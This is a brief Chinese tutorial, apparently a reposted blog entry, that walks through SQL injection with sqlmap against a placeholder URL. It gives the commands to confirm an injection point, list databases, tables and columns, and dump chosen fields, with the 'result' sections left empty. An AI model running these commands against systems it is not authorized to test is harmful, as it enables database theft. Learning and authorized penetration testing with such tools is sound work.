用SQLMAP工具进行SQL注入

1.检查注入点

【注入点需要自己寻找，可以利用一些工具，例如：Acunetix Web Vulnerability

scanner （WVS），AppScan等】u表示URL。

sqlmap   - u   http://www.XXXXX.com/a.asp?p=18

2.列出数据库信息

【sqlmap会帮助我们列出所有的名称，包括数据库类型】

Sqlmap   -u   www.XXXXX.com/a.asp?p=18   --dbs

3.指定数据库名列出所有表

sqlmap   -u   www.XXXXX.com/a.asp?p=18  -D  数据库名 --tables

结果：

4.列举指定数据库指定表的所有字段

sqlmap   -u   www.XXXXX.com/a.asp?p=18 -D 数据名 -T  表名称 --columns

5.输出指定字段的内容

sqlmap   -u   www.XXXXX.com/a.asp?p=18 -D 数据名 -T  表名称 -C 字段1，字段2   --dump（根据自己的需要，将一些字段输出）

结果：

---恢复内容结束---

用SQLMAP工具进行SQL注入

原文：http://www.cnblogs.com/smilewxt/p/4250313.html